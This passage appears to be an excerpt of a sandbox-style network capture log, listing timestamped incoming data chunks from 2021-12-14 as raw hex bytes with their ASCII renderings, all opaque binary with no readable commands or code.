2021-12-14 11:52:59 UTC	149	IN	Data Raw: 5f ce 1d 9b 43 34 5c bc 08 66 2c de 6d 88 46 93 b8 b2 c2 96 73 67 bd 49 cd af bc bd 9a f5 49 af 1e e2 c0 68 bb 0c f7 f4 19 d1 31 88 c3 09 76 92 26 87 3c 77 ca b4 7c 54 37 6e 61 f0 5a 16 0f 09 c5 cd 00 ca fd ef e2 10 79 21 4e 2c aa 6c 22 cf ca 1a 8c 3c 15 7a 8c df c4 50 d0 1d 18 d9 c9 ec 78 02 08 65 5b 5f 88 8a 9a 80 6a 7b 0d 97 1f bd 3a fb d7 6e 40 16 7c d7 86 cb 1c ea 24 ca b6 75 a4 74 72 e8 94 bf c7 5f 81 ff 74 39 7e 47 d9 9c 39 2f 71 e1 ca fe fb a6 c7 97 50 2d 21 03 b7 4b b9 e5 2f ef 39 c9 dc f3 01 6f 03 55 b1 de 36 14 1e 54 5a f7 ce cb 58 6d a4 ab 40 ae dc e4 e1 30 29 8a 23 41 e6 3d ca a0 e0 ea 78 a3 7d 80 eb 0f e0 97 04 3c 63 32 10 7d 51 c8 6b 6c 8f 2f 22 67 b5 ae c2 0a a9 91 fb be 11 7b 17 a0 4d db 7d a8 b3 08 57 01 a8 ce 92 c8 bc 45 b1 77 47 76 e4 Data Ascii: _C4\f,mFsgIIh1v&<w\|T7naZy!N,l"<zPxe[_j{:n@\|$utr_t9~G9/qP-!K/9oU6TZXm@0)#A=x}<c2}Qkl/"g{M}WEwGv
2021-12-14 11:52:59 UTC	150	IN	Data Raw: d9 9a 41 8d e3 ad d1 21 f1 4e 97 dc d5 18 0c 25 15 56 5a 56 01 c1 ba d6 3f c7 82 4f 60 63 6a 9b 0e 69 dc 6d 46 c7 03 87 e7 57 7f 37 a1 da 4a 79 a7 24 e8 70 f3 b8 5c 9f ad 22 f5 6e 33 86 42 e9 aa 56 a5 40 23 ab 7a b3 15 ff ba 00 98 73 50 7f 03 5e 47 0e c8 61 45 93 cd db b8 22 d2 c9 37 18 31 d5 a4 d2 8a b6 42 78 36 c5 87 15 71 1c c3 0d 2b ef cb 9d 4a 6a 21 73 37 1a eb 27 bc 66 98 d7 71 f8 33 df 9b 80 1b 0b 57 61 7b e8 29 d8 fd 8f f8 31 3e 17 49 38 ba 7a 03 43 84 72 cd 98 1f c9 d4 7b 64 bf f4 19 24 7e e4 59 7f bf 28 20 4b 3a d7 13 99 da 60 f8 7a ae 35 97 27 11 87 3d 6a 83 8b 56 d2 14 13 c7 d5 02 c1 b2 19 d8 e2 d1 05 4a eb 6c d1 34 85 62 cb 39 6e de 7b 6d c6 f5 92 d2 31 96 52 05 ea 2a 34 18 36 54 44 32 5f db cc 6c 93 12 1a bb f9 d4 27 ea 6e 1c 5d 09 c5 9c b9 Data Ascii: A!N%VZV?O`cjimFW7Jy$p\"n3BV@#zsP^GaE"71Bx6q+Jj!s7'fq3Wa{)1>I8zCr{d$~Y( K:`z5'=jVJl4b9n{m1R*46TD2_l'n]
2021-12-14 11:52:59 UTC	151	IN	Data Raw: 97 60 96 fe cb 6e fa 8d 28 6e 26 3d 92 26 a9 d7 44 0d 61 3b 07 7b 8a 6f da ae e0 66 32 4b cb ef 36 14 42 d0 62 62 3e 3d 27 05 e7 02 0c b3 c2 08 af a6 88 89 83 c8 29 d0 58 c9 0e 27 90 84 83 b7 ee 2c 1c ca 72 89 fb 77 5e d5 97 f0 2e f1 51 91 33 1c 19 68 15 eb e3 39 62 13 99 03 76 26 1f 0c 3e 95 3a da ca 10 9b 01 6b 7d 0e a4 1a 34 b1 c0 75 80 3d d1 e2 5b 39 de ff b5 41 bb ce ec a2 a2 9a a6 76 ad 7d d7 78 3d aa e5 a1 17 bb 2e fb 88 e6 a0 42 c0 6a 63 1d fe 9a 82 18 a8 d5 2e 10 84 bb 26 7d 88 76 0e 13 4a fa ab ce 12 0a c8 d5 47 c7 5a 88 be 2c 10 2b 3d 89 c5 a5 21 82 7d 25 a1 c8 82 43 07 a2 3b cd e4 01 67 ad 3c 58 37 07 3e 9c 26 2a 54 8f d3 c6 ff b6 c8 e5 3c 04 0b 4e 9c d3 93 7d 2e e8 3b b5 37 cb 48 72 85 3c 98 cb 30 0d ee 6c 33 f7 c0 8e 5b 15 c7 b7 65 ad c6 d7 Data Ascii: `n(n&=&Da;{of2K6Bbb>=')X',rw^.Q3h9bv&>:k}4u=[9Av}x=.Bjc.&}vJGZ,+=!}%C;g<X7>&*T<N}.;7Hr<0l3[e
2021-12-14 11:52:59 UTC	152	IN	Data Raw: 75 df a8 af 42 83 6b 5e 36 e7 5b d2 c8 33 a9 9c ad 49 96 51 6a e5 a0 58 7b 84 9c 60 2c 7c ab 8b c7 d7 8a 1e f3 b1 34 3c 60 a6 66 9d 50 38 2d 8a ee 01 ae ee 5f ed 72 53 46 a8 76 a6 53 89 c2 2b f5 48 1b dc 28 48 1b 71 07 7b cb 20 57 63 90 97 a4 ba ce d3 fe 82 7d 1b 57 85 7d 0a d4 fb d7 64 69 00 f7 48 fc e4 50 96 32 5a 61 f4 a5 1e 45 f1 fe 27 a3 58 f4 64 02 c6 e7 dc 46 a0 3d 4d c3 1d 84 78 58 72 15 70 de 0c ee 5f 97 d4 e7 ed 10 19 2d 44 3c 02 5d 9d 05 3e da a3 bf 83 26 83 aa 4e 6c 7e 27 ab 18 de fe 79 62 0e fe be 2b d4 70 80 68 6c b1 b8 e5 38 44 34 7e 10 01 f1 21 ad 50 bc 8d 32 df 08 4f ee 14 1c 10 5c 50 69 fb 6c 84 4f 8a ea 69 3c 32 5f 3d a1 51 05 26 da 6c e3 b8 30 d4 d5 4b 41 c5 d8 ab 6f d1 d7 62 43 b5 1b 10 78 52 4e 31 ba 9e 61 ed 49 68 de 59 c1 94 71 e4 Data Ascii: uBk^6[3IQjX{`,\|4<`fP8-_rSFvS+H(Hq{ Wc}W}diHP2ZaE'XdF=MxXrp_-D<]>&Nl~'yb+phl8D4~!P2O\PilOi<2_=Q&l0KAobCxRN1aIhYq
2021-12-14 11:52:59 UTC	154	IN	Data Raw: cc a0 b8 50 35 3b e6 67 66 3b d8 90 be b7 ab f6 bb 3f 22 dc 19 40 e3 aa 13 c7 93 5b 89 56 39 07 4c ac d7 5f 4c 99 89 9e 05 46 e0 35 81 fe d9 d5 8e 7d 2c c2 e4 38 eb d3 69 38 2c 9c 36 51 23 d4 fb 04 f3 54 38 5c fa 79 1d e2 fd ea a5 5a fc 31 4f 74 32 1e 5e 20 28 de 0c ff ca 8e 47 03 65 c1 18 d1 ef b3 7d bc a4 f6 ed d4 80 5b d8 b3 59 30 a4 32 2f 6d 2a 2e 5b a5 4e d0 7a 8b 96 23 6b 72 5a 0d ee d2 0e e4 08 2f b1 9f 36 1c 4c ec 3f b1 73 f1 ee ed 85 b5 53 1a ea b2 d7 07 c8 c5 e6 af 8b fb 54 a8 04 12 98 12 85 81 81 8c 2c a9 b0 35 1b c6 38 8e 25 54 a5 f7 68 4e 03 ed 49 7d 40 0f 2e 10 6b a4 6d b5 1b e5 ec 77 29 62 ed 12 a8 11 25 85 96 25 bd 12 37 31 cf e8 fb 69 d8 ec 51 7a 0e 28 a6 b6 58 eb c7 c2 d2 6d 21 05 c8 c2 0e 76 9c 7b 9e 5a 24 be 92 c0 d4 70 7d 17 c4 2f 9a Data Ascii: P5;gf;?"@[V9L_LF5},8i8,6Q#T8\yZ1Ot2^ (Ge}[Y02/m*.[Nz#krZ/6L?sST,58%ThNI}@.kmw)b%%71iQz(Xm!v{Z$p}/
2021-12-14 11:52:59 UTC	155	IN	Data Raw: 2c 85 63 82 9e d3 f2 11 05 23 6b 2b ff c7 8a 8e 9a 85 3a f3 98 21 a4 99 12 cd 2d 07 16 0e 64 b3 7b 8e e8 d8 00 af 94 30 2b 93 c0 38 ca ef fc ff c2 ba 6d 77 10 00 62 a6 79 99 fc de 84 74 cc d4 d6 12 b9 ca 8b 04 e6 01 c2 82 7b ec 60 74 81 1c 29 4e 85 03 92 8c 6d 11 ee cb 3f 79 e1 9a 80 11 3c 6b 70 3c 83 78 3c aa c6 f0 13 d3 30 f0 d6 8c 28 59 b2 1a 5a d5 7d f3 f4 bd 4c 9b 2f de 0c 4b ad 4f f6 a6 55 c6 b0 dd dd b1 c9 66 9f c9 d5 1a 0a 2f 1b 37 6f 7d 11 c5 83 ef 00 f4 97 5e 3a 70 ff e2 86 45 ed 71 7d d4 26 a9 f3 c7 7c 27 90 dc 4d 67 b1 16 cb 65 b2 94 67 b0 8b 2d ef 73 0a b2 78 e3 35 18 00 79 05 b7 99 74 d1 24 26 73 20 b2 d5 cf b3 c9 cf 99 5a d0 e1 28 41 56 5b f3 6e 4e c7 ef 9e cf 5f ca 0e 31 88 eb 8b 7a 4f a8 22 81 3b f5 e3 2a 21 6e bd cf c8 ba e1 f6 07 c2 11 Data Ascii: ,c#k+:!-d{0+8mwbyt{`t)Nm?y<kp<x<0(YZ}L/KOUf/7o}^:pEq}&\|'Mgeg-sx5yt$&s Z(AV[nN_1zO";*!n
2021-12-14 11:52:59 UTC	156	IN	Data Raw: 0c da a3 45 9e bb 3d 10 44 7b fb b5 ec 41 c0 2b 9c 27 37 42 dc 76 b0 9f 10 2f 92 11 43 9e ed f4 4b ae f6 71 6a 8f 87 43 53 60 70 dd f5 a8 a7 b7 07 79 85 23 55 7e b6 44 67 df b0 71 4b fd 11 a4 a0 60 0b 58 fc 8b f6 46 ff bf e7 3f 32 02 3e 17 65 31 e5 fc 48 83 dc 72 74 cf 5f 0c c2 1f 8c e5 cd e4 03 28 8f ea 30 31 30 e1 d3 60 cd 23 55 3d 50 03 e9 f7 08 61 b0 44 4a b7 ae bb 0b ad 8d a7 22 28 aa 08 b1 c5 e0 21 cb ce 04 57 42 40 97 03 bb da ec b9 d3 ce fd 8d 6e c4 36 08 5b 83 a3 a9 2f 65 ac f3 df 47 f2 90 da ca ed e3 04 fb ce 3a f9 3d a7 8c cd e9 e0 db 26 9c 5a aa 16 04 80 f6 e3 b7 eb 0f 27 ec 45 b9 d5 45 65 dc a9 8b 04 92 71 b9 61 62 4b 10 79 8d 90 64 27 40 d1 49 5c 44 3c 69 59 f3 41 ed ff 20 a5 2f 25 21 31 c3 6e 29 b7 d7 09 bc 06 b2 c1 6b 27 fa ed 8c 6c 93 e9 Data Ascii: E=D{A+'7Bv/CKqjCS`py#U~DgqK`XF?2>e1Hrt_(010`#U=PaDJ"(!WB@n6[/eG:=&Z'EEeqabKyd'@I\D<iYA /%!1n)k'l
2021-12-14 11:52:59 UTC	157	IN	Data Raw: c6 d6 34 b1 a8 d0 14 31 62 36 63 a5 45 0d a2 da 55 06 f9 5a 50 36 3e ae 37 61 3c cb cc 92 c2 66 d4 31 3b 29 ad ed da a1 99 5e d3 06 09 a6 f6 70 78 3b ec dc e5 4f d1 fe ed e2 79 4f 32 37 7a bb 91 ae 50 ed 48 44 73 38 ad b9 e3 db bf 19 73 6a 6e 61 2e 9e 47 62 c0 16 1a d3 0b 90 b5 91 88 e3 36 f4 0d 1b 23 cc 23 02 a5 85 32 71 8f 76 05 74 47 48 1b c7 c2 88 93 db 3a f4 1f 46 78 1a cd 7f 4b 5b 81 36 48 49 d6 2e d1 9d d3 34 9b 1f 19 ec 72 4b 7f 98 53 a7 a7 30 85 3a 69 a0 a0 4d 18 13 98 9d c1 ee 8a 1c fa b8 0f 03 40 8a 46 99 4f 20 38 83 a9 43 fa ab 4e ef 79 4c 2a ca 1c e8 12 cc a0 43 83 31 7b 8d 29 26 58 24 4d 28 9e 6e 3a 42 a4 e4 d8 e8 dc 8a 8e e7 58 39 5f 8c 60 51 9f a4 fb 6e 76 05 f9 54 ff e7 02 c7 31 7f 5e c0 d8 72 21 d7 e9 38 b7 21 f7 4e 3e e5 23 3d b2 42 ee Data Ascii: 41b6cEUZP6>7a<f1;)^px;OyO27zPHDs8sjna.Gb6##2qvtGH:FxK[6HI.4rKS0:iM@FO 8CNyL*C1{)&X$M(n:BX9_`QnvT1^r!8!N>#=B
2021-12-14 11:52:59 UTC	159	IN	Data Raw: 68 75 f9 81 d2 bb 5b 94 4b 3f d4 38 23 08 5c c0 42 a8 5e a3 c6 43 99 1c 1c ca 61 81 0a fa 4b 3f 15 6c ac fc fb 99 e2 07 5e 37 38 b6 6d dc c4 ce ac e0 e7 bb ea 26 89 8d a6 33 dc fa 13 5f 31 54 fe 99 78 61 f1 19 34 ad 9c ee ff 76 05 62 e3 75 f1 0f 9b b4 e2 7e d8 16 37 81 94 02 92 bd 0c 58 55 ca 39 79 c2 e1 06 26 c3 df f7 cf 68 4d 07 1a 27 50 2c c7 63 1e 09 ea 01 23 80 ff 3f 54 c3 2e 04 07 bf 92 9a 1c 60 5e 84 5d 64 44 fb d6 f5 9c 82 cb 8c 4a 54 cc 26 69 cf cd 37 fd 9c 6a bc 2a 70 4e 7f 9c bf 3d 50 86 80 97 43 21 e0 7c 8d f6 8f 90 dd 3e 27 dd b2 69 b8 a6 4d 4d 52 f7 49 24 5c a9 9f 64 8a 76 14 30 be 33 6e c3 f0 99 93 28 b1 3f 31 16 51 40 2f 1c 04 ff 33 91 df a6 7d 26 55 b1 ac 7f 4b 04 9a 5a 20 72 40 69 74 97 53 70 cd 88 52 cb d2 9e 9a a3 a7 4b b0 23 e0 5e 69 Data Ascii: hu[K?8#\B^CaK?l^78m&3_1Txa4vbu~7XU9y&hM'P,c#?T.`^]dDJT&i7j*pN=PC!\|>'iMMRI$\dv03n(?1Q@/3}&UKZ r@itSpRK#^i
2021-12-14 11:52:59 UTC	160	IN	Data Raw: c0 37 4c 41 7f f6 ae 9d 04 4e 85 51 89 6e 95 50 1a f5 02 f6 a8 72 5e a6 24 1e 9a 84 d4 1e 2e dd c7 2c f7 ce 94 97 56 14 65 7b c9 dd 02 ed cc 05 e5 69 a8 e4 a6 cf 1a cb e8 f0 34 75 2b 3d 0f 6a ed 2e 37 c2 43 5d 41 b2 8b d5 a5 ea 23 95 bb 36 6d d1 90 62 f8 d4 e9 9a 23 49 1c 62 e1 91 f0 a0 1d a8 7b 46 4d d6 8b a5 2f 03 99 78 d1 94 3d 79 bd ed bf 3e 65 62 d1 51 3c 13 7d de f6 83 8a f4 0a 2f 40 b2 00 e7 f1 83 a9 20 26 73 0e 3a 94 f9 e7 f7 e5 ef 54 94 fa 12 ce ac 36 e8 3d 1a 38 28 45 82 57 e8 b3 9d 63 d5 83 35 01 f6 b3 4e a9 84 91 80 96 cf 69 4f 2e 27 58 9e 50 fa fe f3 8d 45 f1 f8 e4 21 cf cc b9 36 ea 03 21 38 a3 0e 91 9b 63 a9 81 f9 3a f0 35 61 e0 ec 1d 29 d1 d1 37 32 33 b2 c1 98 b8 ff 60 9e 7d e4 a0 e0 35 f5 58 8b f5 a3 05 6c 87 7b 5b e2 40 c8 fb 9d 2f 86 5d Data Ascii: 7LANQnPr^$.,Ve{i4u+=j.7C]A#6mb#Ib{FM/x=y>ebQ<}/@ &s:T6=8(EWc5NiO.'XPE!6!8c:5a)723`}5Xl{[@/]
2021-12-14 11:52:59 UTC	161	IN	Data Raw: 62 d4 05 a6 f4 53 91 8b 08 1c e1 ae fa 25 c2 c6 09 5e 98 2a 28 53 3f 4e 67 e5 f7 57 cc 77 aa 35 9e 0f 5f a1 33 67 8f 9a 69 ff 15 0d c5 c1 b4 f9 04 64 f3 9f 89 28 64 8b 4c 30 67 8f 1b 9e 38 1d e2 0d 0d de f5 d3 a3 09 e2 68 49 a2 46 07 2b 2a 4a a4 62 a0 1c 09 d3 0b ec f7 7e b6 20 c2 2d 86 c7 85 d3 0c 56 43 11 5d 96 d1 c2 b0 07 da 6e 63 5a 26 78 48 2a 7b c3 56 23 34 bf 5b 7e a0 df a7 d2 3f 5a ab d3 23 f8 82 10 2d 46 4e d7 c3 b9 6b ce 23 f4 58 7d 34 af 12 c2 ef 23 2b a5 35 23 aa 80 ae 36 de 8f 5a 42 f1 93 28 3b 7a 59 fc f6 88 a7 81 e5 d5 4b d9 b0 b8 4b ab 80 31 49 bd f2 6a ae 6f 30 9d c8 cc 52 23 21 c5 2e 12 2e 96 aa a7 0e 02 54 10 fa dc 62 a7 f6 5a 53 f3 28 78 e7 7f a0 8c a4 9c 70 57 dd 84 46 44 18 94 f8 66 aa 59 5a 7d 63 76 cb d6 69 41 cb 18 62 83 9a 83 7d Data Ascii: bS%^(S?NgWw5_3gid(dL0g8hIF+Jb~ -VC]ncZ&xH*{V#4[~?Z#-FNk#X}4#+5#6ZB(;zYKK1Ijo0R#!..TbZS(xpWFDfYZ}cviAb}
2021-12-14 11:52:59 UTC	162	IN	Data Raw: fb 3f 8e d3 30 d1 b3 fc 90 a6 b7 3f c7 bd ef 7e 68 5a 6d 3e 20 17 62 b9 c9 af 54 84 e8 2e 0b 2b 83 8c ee 05 ab 19 14 96 73 fd 9b 9f 20 64 c2 87 74 3d 8d 2e e5 50 cf 96 4a 8f fc 1d d7 57 01 9a 4e dd 1d 30 2b 52 1c be 41 a7 08 fa e2 ac aa 48 64 67 05 61 79 6f c7 7e 4d 99 e8 f4 94 24 da e2 1e 08 2c 6e e1 78 83 92 64 6e 16 da b0 2b d3 2f 28 dd c0 08 12 1f a7 a4 c0 88 cf d5 39 ec 27 a6 6e 07 a5 69 ea 87 30 c8 e9 db 80 9f bc 32 e9 2e 82 4f 3b c3 f1 cd b3 d7 4c 90 cc e4 62 94 20 6e d7 16 08 85 94 52 6c 43 ab 17 1a bd 83 7c ca 98 e0 a3 c6 b7 33 51 c3 5b fa 1d b6 19 91 ca 03 b9 f9 0b 3f eb 68 8c 81 48 23 3a 2e b3 82 01 5f 65 a0 ee 62 c1 e1 ac 01 ce 5c e1 c1 72 db c5 63 3b 06 66 9c 3e f7 b1 74 9b 80 a4 ab 72 9e 1d fe 67 8d 09 97 59 57 f7 20 a9 46 ac 26 7c 11 48 a0 Data Ascii: ?0?~hZm> bT.+s dt=.PJWN0+RAHdgayo~M$,nxdn+/(9'ni02.O;Lb nRlC\|3Q[?hH#:._eb\rc;f>trgYW F&\|H
2021-12-14 11:52:59 UTC	163	IN	Data Raw: bb 08 f9 0b 99 b2 1d 1a 84 e1 12 5b b4 3b ab 17 2c f3 08 bb ef bc 24 b0 b4 82 0a 79 34 e6 03 d9 2f 10 a4 c5 12 2b f4 be 43 ed b0 dc 3a cb ac 41 09 cb 60 79 25 2a 1e 32 f1 12 a7 62 ea fc 7e 30 ed 77 17 f6 ed 30 bb 47 27 b6 b8 08 5a 04 ee 75 8e 46 91 9c a9 dc 92 73 a4 8d fc 80 30 bd 21 94 e6 a0 ab 1e 8d 50 7e a5 18 d1 27 d9 e0 02 8e e3 c6 7f 2a 3c 9e 35 9c e6 85 4f 54 1d db 3f 3e 5f 10 0b fd 1e 77 1a c0 67 ce e7 96 58 0b 95 b0 a3 f8 05 e8 e1 b7 b8 8b 39 40 a1 d9 db 50 d1 89 66 87 ec ea 57 30 d4 c5 71 7a 3f bd b7 e4 7f 5d fa 87 1f b1 32 ca d7 68 40 1d 47 47 b1 cf 1c 54 10 f4 d2 ea a5 28 79 70 53 af c7 c6 06 26 51 39 58 54 14 62 31 50 53 77 fc fe fb bf ce 64 69 68 11 03 9d cd e5 4f 1d f9 3d 8b 33 28 29 69 99 e7 8c 74 0a 22 c0 ee 72 2e c6 b9 73 54 af 6d 63 80 Data Ascii: [;,$y4/+C:A`y%2b~0w0G'ZuFs0!P~'<5OT?>_wgX9@PfW0qz?]2h@GGT(ypS&Q9XTb1PSwdihO=3()it"r.sTmc
2021-12-14 11:52:59 UTC	165	IN	Data Raw: 60 73 3d 19 10 2f a2 44 bb 9a 0b 0e b3 2f 32 da f6 7d 36 94 51 84 8a 06 82 b3 82 66 7d 8c 77 dd 24 63 38 1d 41 da 51 7d f3 ec b5 6f 1c 4a eb f9 e6 44 39 c0 92 2e a6 1c 8f b1 6a 31 8f 12 f9 33 7e 91 97 cc 9e 61 88 e2 00 d1 3a d5 61 84 fa f5 02 0c 25 15 73 4f ce 01 40 a4 da 17 ea 80 ab 70 49 ec f8 97 ae dc e8 67 cd 01 87 e7 59 5b 1a b3 89 68 b5 a4 aa e9 5b d7 95 5c 8b b5 28 dd 36 33 49 44 4d 29 23 3d 41 23 6e 5b b1 16 8a b8 4b bd d0 40 5b 23 5c 44 40 cb 41 6a a3 cd 0c a6 84 fe c9 37 1e 1b c7 db 4b 8b 3b 45 8f 35 56 86 17 eb 3d ee 0b 0a cf c8 83 4a bd 01 d7 1b 18 eb 38 ad 6f a2 d5 71 e3 19 8e e5 8e 1b a9 53 41 7f 93 2a d8 67 aa d5 f4 18 a9 4c 39 ba 7a 23 40 be 72 cd 9a 0e 36 f9 e6 65 bb de 9f 5a 45 e6 59 7b 82 2d fc 4b 88 4c 33 b4 c8 46 13 68 ad 35 8a 07 ab Data Ascii: `s=/D/2}6Qf}w$c8AQ}oJD9.j13~a:a%sO@pIgY[h[\(63IDM)#=A#n[K@[#\D@Aj7K;E5V=J8oqSA*gL9z#@r6eZEY{-KL3Fh5
2021-12-14 11:52:59 UTC	166	IN	Data Raw: 1b da 66 4b 40 ef c7 91 44 93 93 8a b1 2c 5c 54 71 1d 41 9d cd 21 b9 31 9f 16 f2 39 7e a5 ac fd c4 b3 97 77 b1 f8 84 42 46 4d 10 cc 20 ab 5a 36 8f 5c 09 f0 eb 07 a1 b0 6a 58 ba a8 9a 03 38 c9 eb 03 8b f9 97 e2 96 a5 aa 8a 7e 47 7a 1f 59 88 1a 90 fb c1 12 d4 5a 84 9a 6d 9b 27 9f 2d fc bb 99 02 f6 c4 f6 aa 34 f9 b3 ef ec c9 85 30 5c f4 40 3a cb 6b 69 22 2b 2d 0c f8 01 95 6b d9 d3 52 20 37 6c 24 5c ed ac 94 64 14 2f a2 97 7b 0d dd a5 94 da 91 98 9a 54 be 63 63 96 cf 51 1c ad bf 9f d5 54 82 0e e0 5b 4d 00 3d c1 d6 c2 d3 ae 85 f3 2f 5c 92 dc 95 25 5d e6 b6 8d 5b 0d ea 1e 69 16 3b 06 2b 1f cf 89 c2 6a c8 ce 02 61 35 86 2c ab 6c d2 f7 ec 18 8d 23 28 4c ac df c5 56 59 94 75 42 c9 ec cb 03 9f 65 5a 5f 3b b3 a7 90 4d 5b ba 9b 02 a3 1c ca 66 68 53 0b 0e 7f 3f c8 5b Data Ascii: fK@D,\TqA!19~wBFM Z6\jX8~GzYZm'-40\@:ki"+-kR 7l$\d/{TccQT[M=/\%][i;+ja5,l#(LVYuBeZ_;M[fhS?[
2021-12-14 11:52:59 UTC	167	IN	Data Raw: f5 d6 c5 ec 89 39 1d 31 1f 58 32 95 82 b6 6c 81 dd 16 3b 29 b5 7e 8f b4 42 3c 80 5f 1d bb 9e 95 ff 3b 71 08 72 50 82 37 92 ad c6 3f 66 83 f9 46 4a 5e 5e 0c 4b db 9a b6 c2 11 59 22 02 60 04 dd 65 62 62 a6 18 7a ef a1 56 b9 9c cd 98 b2 ea 1e de 54 69 5b de 56 83 9a 4c 43 a2 80 67 60 18 d0 ea 64 73 3d 88 40 91 2e 6f f5 76 ae 7c b9 1c 1a 6c e5 51 15 96 e2 38 a1 09 be e7 4d f0 fa 06 d7 64 fe db 71 cc b2 37 0d 13 ac c4 97 82 e3 4e fd e0 34 59 a5 70 74 58 57 57 41 5c d1 02 c6 d6 cf fa 4b f9 c9 c1 e8 e9 7d 73 ea 56 07 21 cf 4f 36 e5 7c 17 6c b1 08 be d0 26 97 49 b3 e4 a8 3c 56 24 aa 12 43 32 2b 29 6d 25 a9 c0 b7 05 fd ec 1a 29 5f 72 75 75 dc 50 09 fb 6d 3c 3e 0c da 95 26 a9 4b 7d 19 28 7f 8c cb 78 b7 75 74 63 46 4c 12 d8 15 b8 9f 68 cd fb b2 1c ea f8 4d 29 36 ed Data Ascii: 91X2l;)~B<_;qrP7?fFJ^^KY"`ebbzVTi[VLCg`ds=@.ov\|lQ8Mdq7N4YptXWWA\K}sV!O6\|l&I<V$C2+)m%)_ruuPm<>&K}(xutcFLhM)6
2021-12-14 11:52:59 UTC	168	IN	Data Raw: 5f c8 ae 40 28 cf 17 2b 33 89 f4 cd e7 31 28 db 49 ab 68 da be ef 76 cb 0f 21 dc bd a1 b4 e1 2b 80 35 f7 14 42 c3 cd 3e 93 ef 84 d4 cd 65 2f 43 00 3e 5e 26 da 78 ce 00 e2 05 28 95 f4 6f 50 f8 1d da cd 76 dd 50 2e 85 9d 54 a1 ff 8a 25 2d 17 47 40 89 54 1a 84 2f e8 b1 0b 17 e2 bb 6f b4 4d 0c 8d 65 9e 7b 5d d7 94 40 47 cd 9c f2 13 3d 5a ee 53 53 1a f2 ea 07 7c 28 79 4b 9b 3c b2 e0 a7 d8 ea 03 12 ff 0b 7f 97 b4 20 02 e0 bc 73 13 1e a1 17 92 fa 41 9e e8 9c 0d 9a 81 a2 00 79 30 fd bb c3 a9 10 cf d7 3e 30 00 b6 e1 ed c9 db 3c cb 69 41 2c d8 f2 78 21 23 23 01 f7 12 97 6a 59 cf 6e 10 a1 6c 2f cc fb 30 89 65 14 85 3e 08 70 2c 49 47 9a 4f 9c 99 9a ef 94 73 e1 97 d9 93 a2 bc aa 97 c5 93 79 40 e2 5a 4d 96 0f d1 c0 c4 7d 39 99 e3 91 02 92 26 98 35 4e e7 57 69 b4 1f f9 Data Ascii: _@(+31(Ihv!+5B>e/C>^&x(oPvP.T%-G@T/oMe{]@G=ZSS\|(yK< sAy0>0<iA,x!##jYnl/0e>p,IGOsy@ZM}9&5NWi
2021-12-14 11:52:59 UTC	170	IN	Data Raw: 5f c8 6b 73 80 07 0c 65 f3 ab 81 87 c8 07 df be 85 cc f7 a2 4d db e1 95 b3 3f 62 21 6d cc 92 c8 9c 3b 1a 77 d6 49 7c a8 db fe e8 11 98 11 4f f4 26 71 ba 4b 2b 83 f5 19 b4 f5 db 99 03 29 c8 57 84 f9 6b 92 37 cc 1b 31 ae de d8 c1 b4 ae 89 32 95 17 71 18 25 b3 b3 8c b5 6e 35 86 49 81 ae 8a f7 f6 1e e5 ed d3 79 84 17 06 ba 85 a9 66 e5 62 62 59 a7 c8 0c df fa a3 a2 cb 05 ca 45 46 47 05 c9 e9 65 71 a4 19 7b 2e 34 44 38 95 e8 0c 6f b6 37 d8 54 7d 5a 95 c0 84 89 06 61 b1 e2 fc 60 8c d1 dd 0a 60 1a 08 52 da 09 69 f3 ec a8 6f b8 4a 9c e0 c9 61 c8 c2 47 2c a6 1c 92 b1 ce 31 bd 10 9f 39 cb 9e 53 d9 9e 61 8d e0 ae d1 fd d7 39 8e e2 fa 3d 0f 25 15 76 4d 78 01 87 a6 b1 1c 28 8f 6a 66 49 ec e5 97 6b dc 6f 7e eb 25 76 e5 e8 5a 1a b3 fc 6a 7b a4 62 eb 34 dd 20 53 ba b2 28 Data Ascii: _kseM?b!m;wI\|O&qK+)Wk712q%n5IyfbbYEFGeq{.4D8o7T}Za``RioJaG,19Sa9=%vMx(jfIko~%vZj{b4 S(
2021-12-14 11:52:59 UTC	171	IN	Data Raw: 60 24 7b 6d e6 9d ac d2 c2 88 86 2f ed 28 7c e4 1c d6 3a ab 4d db 5c 4d 6f 1a 30 bb 3f 0a 0a fb 48 3c 49 0a 03 ac 6e ce 89 4b 9c e9 68 d6 18 a8 a4 a4 0f 98 74 ef 8e 0a 21 3e d5 53 bf 9c 79 3a d6 0c 37 b7 6a 28 a7 17 2a b3 89 e2 fe 73 c0 78 24 51 81 24 16 bf ee 76 cb 19 32 a1 cc 25 6f e8 01 48 6d f2 15 42 c3 db 2d 07 17 fa cb cd 4f 4f c2 05 3f 5e 26 cc 6b 0f 15 ef b0 27 bf fc 1d 56 f9 1d da db 65 49 90 ee 3b 92 7e 91 6a 8c 24 2d 17 56 53 1d 9a 9f 71 32 c2 b1 b7 1d e3 3b 6f a5 7e fc 95 80 61 66 77 d7 24 52 46 4d 9c e3 20 a9 cf 37 9a 57 30 f2 ea 12 7d a8 79 5a a8 a8 27 00 33 d0 c0 03 5a ea 0a ff 97 a5 13 96 ab 5d 3c 05 34 a1 97 87 fb c1 9e f9 af 99 91 6b 5d 1d 53 30 9d ac c2 29 10 d9 e4 aa ad f0 65 ef c7 c9 b7 24 ca e9 41 3a eb 66 33 27 b4 37 2b f7 f6 8e 6b Data Ascii: `${m/(\|:M\Mo0?H<InKht!>Sy:7j(*sx$Q$v2%oHmB-OO?^&k'VeI;~j$-VSq2;o~afw$RFM 7W0}yZ'3Z]<4k]S0)e$A:f3'7+k
2021-12-14 11:52:59 UTC	172	IN	Data Raw: b8 ce bf 7d 29 29 be b2 84 c6 35 2e eb 7e e8 02 f1 01 69 91 b4 b3 0c 10 7d c0 46 19 f6 ee af 73 6b ac 3e 68 cf f0 ac e1 72 40 0d 5d d8 e7 3b c6 13 1c 28 78 e9 e7 e8 85 1c c6 b7 db 38 7b 1f 15 01 7a 83 6b 2f c3 06 0f 65 b5 ae e0 00 da 41 fb f5 15 cb b4 a3 4d db e7 8b 96 86 7c e1 48 87 92 54 df 3a 9a 77 47 6f e0 43 9c b8 cc 5d 98 c1 0c f5 a6 71 2b 6d b7 75 ab d6 91 b9 db 45 40 28 48 57 15 df f7 72 65 8a 3f 7c 18 59 9c c0 94 ae 9f 3c 09 f8 18 d7 00 fe 7e 07 f1 6f 15 86 5f 8f b2 b5 ba dc 3f ab 09 14 3d 85 37 06 ac 8b 35 2d ae 93 46 17 5c 03 48 de da a3 b4 c5 19 b7 2b 6c 66 4a dd e1 21 70 a4 19 7a 28 a8 c3 b3 64 cc 43 b3 b3 73 d9 54 7d 5c 93 5c ab ae 28 45 e1 82 b6 24 8d d1 dd 4e 64 35 27 75 42 2f 39 f3 30 ec 6e bb 4a 9a fe ec fb 2c e5 66 